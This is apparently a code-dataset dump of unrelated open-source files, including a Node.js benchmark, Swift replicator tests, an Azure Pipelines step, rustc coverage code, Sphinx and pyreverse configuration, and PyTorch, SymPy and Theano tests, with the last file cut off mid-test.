code stringlengths 1 25.8M | language stringclasses 18 values | source stringclasses 4 values | repo stringclasses 78 values | path stringlengths 0 268 |
|---|---|---|---|---|
'use strict';

const common = require('../common.js');
const assert = require('assert');

// One benchmark run per `method` value; each method exercises a different
// dictionary implementation for `n` insert/lookup/clear cycles.
const bench = common.createBenchmark(main, {
  method: [
    'object', 'nullProtoObject', 'nullProtoLiteralObject', 'storageObject',
    'fakeMap', 'map',
  ],
  n: [1e6],
});
function runObject(n) {
  // Baseline: plain object (default Object.prototype) as the store.
  const store = {};
  bench.start();
  for (let index = 0; index < n; index++) {
    const intKey = `i${index}`;
    const strKey = `s${index}`;
    store[intKey] = index;
    store[strKey] = String(index);
    assert.strictEqual(String(store[intKey]), store[strKey]);
    store[intKey] = undefined;
    store[strKey] = undefined;
  }
  bench.end(n);
}
function runNullProtoObject(n) {
  // Null-prototype object built with Object.create(null). The
  // "nullProtoLiteralObject" case below covers the `{ __proto__: null }`
  // literal form, so this case must use Object.create to actually
  // measure a different creation path (as written, both cases were
  // byte-identical and the comparison was meaningless).
  const m = Object.create(null);
  bench.start();
  for (let i = 0; i < n; i++) {
    m[`i${i}`] = i;
    m[`s${i}`] = String(i);
    assert.strictEqual(String(m[`i${i}`]), m[`s${i}`]);
    m[`i${i}`] = undefined;
    m[`s${i}`] = undefined;
  }
  bench.end(n);
}
function runNullProtoLiteralObject(n) {
  // Null-prototype object declared with the `{ __proto__: null }` literal.
  const dict = { __proto__: null };
  bench.start();
  for (let idx = 0; idx < n; idx++) {
    const numericKey = `i${idx}`;
    const stringKey = `s${idx}`;
    dict[numericKey] = idx;
    dict[stringKey] = String(idx);
    assert.strictEqual(String(dict[numericKey]), dict[stringKey]);
    dict[numericKey] = undefined;
    dict[stringKey] = undefined;
  }
  bench.end(n);
}
// Constructor whose prototype chain terminates immediately: instances act
// like dictionaries with no inherited Object.prototype members.
function StorageObject() {}
StorageObject.prototype = { __proto__: null };
function runStorageObject(n) {
  // Dictionary backed by a StorageObject instance (null-proto prototype).
  const bag = new StorageObject();
  bench.start();
  let i = 0;
  while (i < n) {
    const iKey = `i${i}`;
    const sKey = `s${i}`;
    bag[iKey] = i;
    bag[sKey] = String(i);
    assert.strictEqual(String(bag[iKey]), bag[sKey]);
    bag[iKey] = undefined;
    bag[sKey] = undefined;
    i++;
  }
  bench.end(n);
}
function fakeMap() {
  // Map-like facade over a plain object. Keys are prefixed with "$" so
  // user-supplied keys can never collide with Object.prototype names.
  const backing = {};
  const prefixed = (key) => `$${key}`;
  return {
    get(key) {
      return backing[prefixed(key)];
    },
    set(key, val) {
      backing[prefixed(key)] = val;
    },
    get size() {
      return Object.keys(backing).length;
    },
    has(key) {
      return Object.hasOwn(backing, prefixed(key));
    },
  };
}
function runFakeMap(n) {
  // Same workload as runMap, but against the object-backed fake map.
  const store = fakeMap();
  bench.start();
  for (let k = 0; k < n; k++) {
    store.set(`i${k}`, k);
    store.set(`s${k}`, String(k));
    assert.strictEqual(String(store.get(`i${k}`)), store.get(`s${k}`));
    store.set(`i${k}`, undefined);
    store.set(`s${k}`, undefined);
  }
  bench.end(n);
}
function runMap(n) {
  // Reference implementation: the built-in Map.
  const map = new Map();
  bench.start();
  for (let j = 0; j < n; j++) {
    const iKey = `i${j}`;
    const sKey = `s${j}`;
    map.set(iKey, j);
    map.set(sKey, String(j));
    assert.strictEqual(String(map.get(iKey)), map.get(sKey));
    map.set(iKey, undefined);
    map.set(sKey, undefined);
  }
  bench.end(n);
}
function main({ n, method }) {
  // Dispatch table keeps each method name next to its runner.
  const runners = {
    object: runObject,
    nullProtoObject: runNullProtoObject,
    nullProtoLiteralObject: runNullProtoLiteralObject,
    storageObject: runStorageObject,
    fakeMap: runFakeMap,
    map: runMap,
  };
  const runner = runners[method];
  if (runner === undefined)
    throw new Error(`Unexpected method "${method}"`);
  runner(n);
}
def smallest_multiple(n):
    """Return the smallest positive integer evenly divisible by every
    integer from 1 to ``n`` (i.e. lcm(1, 2, ..., n)).

    For ``n <= 2`` the answer is ``n`` itself, matching the original
    behaviour (including the degenerate ``n <= 0`` inputs).
    """
    import math  # local import keeps the snippet self-contained

    if n <= 2:
        return n
    result = 2
    for k in range(3, n + 1):
        # lcm(a, b) == a * b // gcd(a, b); fold over 3..n.  This replaces
        # the original trial-division search, which re-scanned all factors
        # for every candidate multiple.
        result = result * k // math.gcd(result, k)
    return result
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import time
import unittest
import shutil
from swift.account import replicator, backend, server
from swift.common.utils import normalize_timestamp
from swift.common.storage_policy import POLICIES
from test.unit.common import test_db_replicator
class TestReplicatorSync(test_db_replicator.TestReplicatorSync):
    """Account-flavoured run of the shared db-replicator test harness."""

    # Concrete broker/datadir/daemon classes the shared harness plugs in.
    backend = backend.AccountBroker
    datadir = server.DATADIR
    replicator_daemon = replicator.AccountReplicator

    def test_sync(self):
        broker = self._get_broker('a', node_index=0)
        put_timestamp = normalize_timestamp(time.time())
        broker.initialize(put_timestamp)
        # "replicate" to same database
        daemon = replicator.AccountReplicator({})
        part, node = self._get_broker_part_node(broker)
        info = broker.get_replication_info()
        success = daemon._repl_to_node(node, broker, part, info)
        # nothing to do
        self.assertTrue(success)
        self.assertEqual(1, daemon.stats['no_change'])

    def test_sync_remote_missing(self):
        broker = self._get_broker('a', node_index=0)
        put_timestamp = time.time()
        broker.initialize(put_timestamp)
        # "replicate" to all other nodes
        part, node = self._get_broker_part_node(broker)
        daemon = self._run_once(node)
        # complete rsync
        self.assertEqual(2, daemon.stats['rsync'])
        local_info = self._get_broker(
            'a', node_index=0).get_info()
        for i in range(1, 3):
            remote_broker = self._get_broker('a', node_index=i)
            self.assertTrue(os.path.exists(remote_broker.db_file))
            remote_info = remote_broker.get_info()
            # Everything except the db-unique 'id' must match the local copy.
            for k, v in local_info.items():
                if k == 'id':
                    continue
                self.assertEqual(remote_info[k], v,
                                 "mismatch remote %s %r != %r" % (
                                     k, remote_info[k], v))

    def test_sync_remote_missing_most_rows(self):
        put_timestamp = time.time()
        # create "local" broker
        broker = self._get_broker('a', node_index=0)
        broker.initialize(put_timestamp)
        # create "remote" broker
        remote_broker = self._get_broker('a', node_index=1)
        remote_broker.initialize(put_timestamp)
        # add a row to "local" db
        broker.put_container('/a/c', time.time(), 0, 0, 0,
                             POLICIES.default.idx)
        # replicate
        daemon = replicator.AccountReplicator({})

        def _rsync_file(db_file, remote_file, **kwargs):
            # Stub out rsync: just copy the db file into the test tree.
            remote_server, remote_path = remote_file.split('/', 1)
            dest_path = os.path.join(self.root, remote_path)
            shutil.copy(db_file, dest_path)
            return True
        daemon._rsync_file = _rsync_file
        part, node = self._get_broker_part_node(remote_broker)
        info = broker.get_replication_info()
        success = daemon._repl_to_node(node, broker, part, info)
        self.assertTrue(success)
        # row merge
        self.assertEqual(1, daemon.stats['remote_merge'])
        local_info = self._get_broker(
            'a', node_index=0).get_info()
        remote_info = self._get_broker(
            'a', node_index=1).get_info()
        for k, v in local_info.items():
            if k == 'id':
                continue
            self.assertEqual(remote_info[k], v,
                             "mismatch remote %s %r != %r" % (
                                 k, remote_info[k], v))

    def test_sync_remote_missing_one_rows(self):
        put_timestamp = time.time()
        # create "local" broker
        broker = self._get_broker('a', node_index=0)
        broker.initialize(put_timestamp)
        # create "remote" broker
        remote_broker = self._get_broker('a', node_index=1)
        remote_broker.initialize(put_timestamp)
        # add some rows to both db
        for i in range(10):
            put_timestamp = time.time()
            for db in (broker, remote_broker):
                path = '/a/c_%s' % i
                db.put_container(path, put_timestamp, 0, 0, 0,
                                 POLICIES.default.idx)
        # now a row to the "local" broker only
        broker.put_container('/a/c_missing', time.time(), 0, 0, 0,
                             POLICIES.default.idx)
        # replicate
        daemon = replicator.AccountReplicator({})
        part, node = self._get_broker_part_node(remote_broker)
        info = broker.get_replication_info()
        success = daemon._repl_to_node(node, broker, part, info)
        self.assertTrue(success)
        # row merge
        self.assertEqual(1, daemon.stats['diff'])
        local_info = self._get_broker(
            'a', node_index=0).get_info()
        remote_info = self._get_broker(
            'a', node_index=1).get_info()
        for k, v in local_info.items():
            if k == 'id':
                continue
            self.assertEqual(remote_info[k], v,
                             "mismatch remote %s %r != %r" % (
                                 k, remote_info[k], v))


if __name__ == '__main__':
    unittest.main()
steps:
- checkout: self
  fetchDepth: 5

# Default: compare against the previous commit when there is no PR target.
- script: echo "##vso[task.setvariable variable=diffTarget]HEAD~1"
  displayName: Set default diff target

# For PRs, diff against the merge-base with the target branch.  The `\$`
# keeps the command substitution literal in the stored variable so the
# shell evaluates `git merge-base` later, when $(diffTarget) is expanded.
- script: |
    git fetch -q origin $(System.PullRequest.TargetBranch)
    echo "##vso[task.setvariable variable=diffTarget]HEAD \$(git merge-base HEAD FETCH_HEAD)"
  displayName: Fetch comparison tree
  condition: and(succeeded(), variables['System.PullRequest.TargetBranch'])

# Skip the test stages when only docs (.rst, Doc/, Misc/) changed.
- script: |
    if ! git diff --name-only $(diffTarget) | grep -qvE '(\.rst$|^Doc|^Misc)'
    then
      echo "Only docs were updated: tests.run=false"
      echo "##vso[task.setvariable variable=run;isOutput=true]false"
    else
      echo "Code was updated: tests.run=true"
      echo "##vso[task.setvariable variable=run;isOutput=true]true"
    fi
  displayName: Detect source changes
  name: tests
use rustc_index::IndexVec;
use rustc_middle::mir::coverage::{
BlockMarkerId, BranchSpan, CoverageInfoHi, CoverageKind, Mapping, MappingKind,
};
use rustc_middle::mir::{self, BasicBlock, StatementKind};
use rustc_middle::ty::TyCtxt;
use rustc_span::ExpnKind;
use crate::coverage::expansion::{self, ExpnTree};
use crate::coverage::graph::CoverageGraph;
use crate::coverage::hir_info::ExtractedHirInfo;
use crate::coverage::spans::extract_refined_covspans;
/// Indicates why mapping extraction failed, for debug-logging purposes.
#[derive(Debug)]
pub(crate) enum MappingsError {
    /// Extraction ran, but produced no mappings at all.
    NoMappings,
    /// `expansion::build_expn_tree` failed — presumably while sorting the
    /// expansion tree; confirm against the `expansion` module.
    TreeSortFailure,
}

/// Coverage mappings extracted from MIR, ready for inclusion in MIR.
#[derive(Default)]
pub(crate) struct ExtractedMappings {
    pub(crate) mappings: Vec<Mapping>,
}
/// Extracts coverage-relevant spans from MIR, and uses them to create
/// coverage mapping data for inclusion in MIR.
pub(crate) fn extract_mappings_from_mir<'tcx>(
    tcx: TyCtxt<'tcx>,
    mir_body: &mir::Body<'tcx>,
    hir_info: &ExtractedHirInfo,
    graph: &CoverageGraph,
) -> Result<ExtractedMappings, MappingsError> {
    // Propagate the tree-construction failure from `build_expn_tree`.
    let expn_tree = expansion::build_expn_tree(mir_body, hir_info, graph)?;

    let mut mappings = vec![];

    // Extract ordinary code mappings from MIR statement/terminator spans.
    extract_refined_covspans(tcx, hir_info, graph, &expn_tree, &mut mappings);

    extract_branch_mappings(mir_body, hir_info, graph, &expn_tree, &mut mappings);

    if mappings.is_empty() {
        tracing::debug!("no mappings were extracted");
        return Err(MappingsError::NoMappings);
    }

    Ok(ExtractedMappings { mappings })
}
/// Builds the marker-id -> basic-block table by scanning every
/// `BlockMarker` coverage statement in the body.
fn resolve_block_markers(
    coverage_info_hi: &CoverageInfoHi,
    mir_body: &mir::Body<'_>,
) -> IndexVec<BlockMarkerId, Option<BasicBlock>> {
    let mut markers = IndexVec::<BlockMarkerId, Option<BasicBlock>>::from_elem_n(
        None,
        coverage_info_hi.num_block_markers,
    );

    // Fill out the mapping from block marker IDs to their enclosing blocks.
    for (block, block_data) in mir_body.basic_blocks.iter_enumerated() {
        for stmt in &block_data.statements {
            if let StatementKind::Coverage(CoverageKind::BlockMarker { id }) = stmt.kind {
                markers[id] = Some(block);
            }
        }
    }

    markers
}
fn extract_branch_mappings(
mir_body: &mir::Body<'_>,
hir_info: &ExtractedHirInfo,
graph: &CoverageGraph,
expn_tree: &ExpnTree,
mappings: &mut Vec<Mapping>,
) {
let Some(coverage_info_hi) = mir_body.coverage_info_hi.as_deref() else { return };
let block_markers = resolve_block_markers(coverage_info_hi, mir_body);
// For now, ignore any branch span that was introduced by
// expansion. This makes things like assert macros less noisy.
let Some(node) = expn_tree.get(hir_info.body_span.ctxt().outer_expn()) else { return };
if node.expn_kind != ExpnKind::Root {
return;
}
mappings.extend(node.branch_spans.iter().filter_map(
|&BranchSpan { span, true_marker, false_marker }| try {
let bcb_from_marker = |marker: BlockMarkerId| graph.bcb_from_bb(block_markers[marker]?);
let true_bcb = bcb_from_marker(true_marker)?;
let false_bcb = bcb_from_marker(false_marker)?;
Mapping { span, kind: MappingKind::Branch { true_bcb, false_bcb } }
},
));
} | rust | github | https://github.com/rust-lang/rust | compiler/rustc_mir_transform/src/coverage/mappings.rs |
# -*- coding: utf-8 -*-
#
# phpMyAdmin documentation build configuration file, created by
# sphinx-quickstart on Wed Sep 26 14:04:48 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "_ext")))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['configext']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'phpMyAdmin'
copyright = u'2012 - 2016, The phpMyAdmin devel team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '4.7.0-dev'
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'html', 'doctrees']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'phpMyAdmindoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'phpMyAdmin.tex', u'phpMyAdmin Documentation',
u'The phpMyAdmin devel team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'phpmyadmin', u'phpMyAdmin Documentation',
[u'The phpMyAdmin devel team'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'phpMyAdmin', u'phpMyAdmin Documentation',
u'The phpMyAdmin devel team', 'phpMyAdmin', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'phpMyAdmin'
epub_author = u'The phpMyAdmin devel team'
epub_publisher = u'The phpMyAdmin devel team'
epub_copyright = copyright
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Highlight PHP without starting <?php tag:
# startinline=True lets Pygments lex bare PHP snippets.
from sphinx.highlighting import lexers
from pygments.lexers.web import PhpLexer
lexers['php'] = PhpLexer(startinline=True)

# Number of retries and timeout for linkcheck.  Anchor checking is off
# because many linked pages generate their anchors dynamically.
linkcheck_retries = 10
linkcheck_timeout = 10
linkcheck_anchors = False
# # Copyright (c) 2000-2013 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
%prog [options] <packages>
create UML diagrams for classes and modules in <packages>
"""
from __future__ import print_function
import sys, os
from logilab.common.configuration import ConfigurationMixIn
from astroid.manager import AstroidManager
from astroid.inspector import Linker
from pylint.pyreverse.diadefslib import DiadefsHandler
from pylint.pyreverse import writer
from pylint.pyreverse.utils import insert_default_options
OPTIONS = (
("filter-mode",
dict(short='f', default='PUB_ONLY', dest='mode', type='string',
action='store', metavar='<mode>',
help="""filter attributes and functions according to
<mode>. Correct modes are :
'PUB_ONLY' filter all non public attributes
[DEFAULT], equivalent to PRIVATE+SPECIAL_A
'ALL' no filter
'SPECIAL' filter Python special functions
except constructor
'OTHER' filter protected and private
attributes""")),
("class",
dict(short='c', action="append", metavar="<class>", dest="classes", default=[],
help="create a class diagram with all classes related to <class>;\
this uses by default the options -ASmy")),
("show-ancestors",
dict(short="a", action="store", metavar='<ancestor>', type='int',
help='show <ancestor> generations of ancestor classes not in <projects>')),
("all-ancestors",
dict(short="A", default=None,
help="show all ancestors off all classes in <projects>")),
("show-associated",
dict(short='s', action="store", metavar='<ass_level>', type='int',
help='show <ass_level> levels of associated classes not in <projects>')),
("all-associated",
dict(short='S', default=None,
help='show recursively all associated off all associated classes')),
("show-builtin",
dict(short="b", action="store_true", default=False,
help='include builtin objects in representation of classes')),
("module-names",
dict(short="m", default=None, type='yn', metavar='[yn]',
help='include module name in representation of classes')),
# TODO : generate dependencies like in pylint
# ("package-dependencies",
# dict(short="M", action="store", metavar='<package_depth>', type='int',
# help='show <package_depth> module dependencies beyond modules in \
# <projects> (for the package diagram)')),
("only-classnames",
dict(short='k', action="store_true", default=False,
help="don't show attributes and methods in the class boxes; \
this disables -f values")),
("output", dict(short="o", dest="output_format", action="store",
default="dot", metavar="<format>",
help="create a *.<format> output file if format available.")),
)
# FIXME : quiet mode
#( ('quiet',
#dict(help='run quietly', action='store_true', short='q')), )
class Run(ConfigurationMixIn):
    """base class providing common behaviour for pyreverse commands"""

    options = OPTIONS

    def __init__(self, args):
        ConfigurationMixIn.__init__(self, usage=__doc__)
        insert_default_options()
        self.manager = AstroidManager()
        self.register_options_provider(self.manager)
        args = self.load_command_line_configuration()
        # Run immediately; the diagram-generation result becomes the
        # process exit status.
        sys.exit(self.run(args))

    def run(self, args):
        """checking arguments and run project"""
        if not args:
            print(self.help())
            return 1
        # insert current working directory to the python path to recognize
        # dependencies to local modules even if cwd is not in the PYTHONPATH
        sys.path.insert(0, os.getcwd())
        try:
            project = self.manager.project_from_files(args)
            linker = Linker(project, tag=True)
            handler = DiadefsHandler(self.config)
            diadefs = handler.get_diadefs(project, linker)
        finally:
            # Always undo the sys.path mutation, even if analysis fails.
            sys.path.pop(0)
        if self.config.output_format == "vcg":
            writer.VCGWriter(self.config).write(diadefs)
        else:
            writer.DotWriter(self.config).write(diadefs)
        return 0


if __name__ == '__main__':
    Run(sys.argv[1:])
import operator_benchmark as op_bench
import torch
"""Microbenchmarks for topk operator"""
topk_configs_short = op_bench.config_list(
attr_names=["shape", "k", "dim"],
attrs=[
[(16, 4), 4, 1],
[(1024 * 1024,), 16, 0],
],
cross_product_configs={"device": ["cpu"], "dtype": [torch.float]},
tags=["short"],
)
topk_configs_long = op_bench.cross_product_configs(
shape=[(64, 2), (1024 * 1024,), (128,)],
k=[1, 2, 4, 16, 32],
dim=[0],
device=["cpu", "cuda"],
dtype=[torch.float, torch.bfloat16],
tags=["long"],
)
class TopkBenchmark(op_bench.TorchBenchmarkBase):
def init(self, shape, k, dim, dtype, device):
self.inputs = {
"input": torch.randn(shape, device=device, dtype=dtype),
"k": k,
"dim": dim,
}
self.set_module_name("topk")
def forward(self, input, k, dim):
return torch.topk(input, k=k, dim=dim)
op_bench.generate_pt_test(topk_configs_short + topk_configs_long, TopkBenchmark)
if __name__ == "__main__":
op_bench.benchmark_runner.main() | python | github | https://github.com/pytorch/pytorch | benchmarks/operator_benchmark/pt/topk_test.py |
# -*- coding: utf-8 -*-
from sympy.physics.unitsystems.dimensions import Dimension, DimensionSystem
from sympy.physics.unitsystems.units import Unit, UnitSystem
from sympy.physics.unitsystems.quantities import Quantity
from sympy.utilities.pytest import raises
# Shared dimension/unit fixtures used by every test below.
length = Dimension(name="length", symbol="L", length=1)
mass = Dimension(name="mass", symbol="M", mass=1)
time = Dimension(name="time", symbol="T", time=1)
current = Dimension(name="current", symbol="I", current=1)
velocity = Dimension(name="velocity", symbol="V", length=1, time=-1)
action = Dimension(name="action", symbol="A", length=2, mass=1, time=-2)

m = Unit(length, abbrev="m")
s = Unit(time, abbrev="s")
kg = Unit(mass, factor=10**3, abbrev="kg")
c = Unit(velocity, abbrev="c")


def test_definition():
    # want to test if the system can have several units of the same dimension
    dm = Unit(m, factor=0.1)

    base = (m, s)
    base_dim = (m.dim, s.dim)
    ms = UnitSystem(base, (c, dm), "MS", "MS system")

    assert set(ms._base_units) == set(base)
    assert set(ms._units) == set((m, s, c, dm))
    #assert ms._units == DimensionSystem._sort_dims(base + (velocity,))
    assert ms.name == "MS"
    assert ms.descr == "MS system"

    assert ms._system._base_dims == DimensionSystem.sort_dims(base_dim)
    assert set(ms._system._dims) == set(base_dim + (velocity,))


def test_error_definition():
    # Constructing with these three units as a base must be rejected.
    raises(ValueError, lambda: UnitSystem((m, s, c)))


def test_str_repr():
    assert str(UnitSystem((m, s), name="MS")) == "MS"
    assert str(UnitSystem((m, s))) == "(m, s)"
    assert (repr(UnitSystem((m, s))) == "<UnitSystem: (%s, %s)>"
            % (m.abbrev_dim, s.abbrev_dim))


def test_call():
    A = Unit(current)
    Js = Unit(action)
    mksa = UnitSystem((m, kg, s, A), (Js,))

    assert mksa(Js) == mksa.print_unit_base(Js)
    assert mksa(Js.dim) == mksa._system(Js.dim)

    q = Quantity(10, Js)
    assert mksa(q) == "%g %s" % (q.factor, mksa(Js))


def test_get_unit():
    ms = UnitSystem((m, s), (c,))

    assert ms.get_unit("s") == s
    assert ms.get_unit(s) == s
    assert ms.get_unit(Unit(time)) == s
    assert ms["s"] == ms.get_unit("s")
    raises(KeyError, lambda: ms["g"])


def test_print_unit_base():
    A = Unit(current)
    Js = Unit(action)
    mksa = UnitSystem((m, kg, s, A), (Js,))

    assert mksa.print_unit_base(Js) == "0.001 m^2 kg s^-2"


def test_extend():
    ms = UnitSystem((m, s), (c,))
    Js = Unit(action)
    mks = ms.extend((kg,), (Js,))

    res = UnitSystem((m, s, kg), (c, Js))
    assert set(mks._base_units) == set(res._base_units)
    assert set(mks._units) == set(res._units)


def test_dim():
    # dim is the number of base units in the system.
    dimsys = UnitSystem((m, kg, s), (c,))
    assert dimsys.dim == 3


def test_is_consistent():
    assert UnitSystem((m, s)).is_consistent is True
from __future__ import absolute_import, print_function, division
import unittest
import numpy
import theano
from theano import function, config
from theano import scalar
from theano.gof import FunctionGraph
from theano.gof.opt import out2in
from theano.tensor.opt_uncanonicalize import (
local_alloc_dimshuffle,
local_reshape_dimshuffle,
local_dimshuffle_alloc,
local_dimshuffle_subtensor,
)
import theano.tensor as tensor
#from theano.tensor import matrix,max_and_argmax,MaaxAndArgmax,neg
from theano.tensor.elemwise import CAReduce, Elemwise, DimShuffle
from theano.tests import unittest_tools as utt
class T_max_and_argmax(unittest.TestCase):
def test_optimization(self):
# If we use only the max output, we should replace this op with
# a faster one.
mode = theano.compile.mode.get_default_mode().including(
'canonicalize', 'fast_run')
for axis in [0, 1, -1]:
data = numpy.asarray(numpy.random.rand(2, 3), dtype=config.floatX)
n = tensor.matrix()
f = function([n], tensor.max_and_argmax(n, axis)[0], mode=mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, CAReduce)
f = function([n], tensor.max_and_argmax(n, axis), mode=mode)
topo = f.maker.fgraph.toposort()
assert len(topo) == 1
assert isinstance(topo[0].op, tensor.MaxAndArgmax)
class T_min_max(unittest.TestCase):
    # Checks that max/min with negation are canonicalized into the minimal
    # graph (e.g. -max(-n) collapses into a single min-style CAReduce).

    def setUp(self):
        # Seed the shared RNG so the random test data is reproducible.
        utt.seed_rng()
        self.mode = theano.compile.mode.get_default_mode().including(
            'canonicalize', 'fast_run')

    def test_optimization_max(self):
        """max and its negated variants must optimize to the expected graphs."""
        data = numpy.asarray(numpy.random.rand(2, 3), dtype=config.floatX)
        n = tensor.matrix()

        for axis in [0, 1, -1]:
            # Plain max(n): one CAReduce node only.
            f = function([n], tensor.max(n, axis), mode=self.mode)
            topo = f.maker.fgraph.toposort()
            assert len(topo) == 1
            assert isinstance(topo[0].op, CAReduce)
            f(data)

            # max(-n): negation followed by the reduce.
            f = function([n], tensor.max(-n, axis), mode=self.mode)
            topo = f.maker.fgraph.toposort()
            assert len(topo) == 2
            assert isinstance(topo[0].op, Elemwise)
            assert isinstance(topo[0].op.scalar_op, scalar.Neg)
            assert isinstance(topo[1].op, CAReduce)
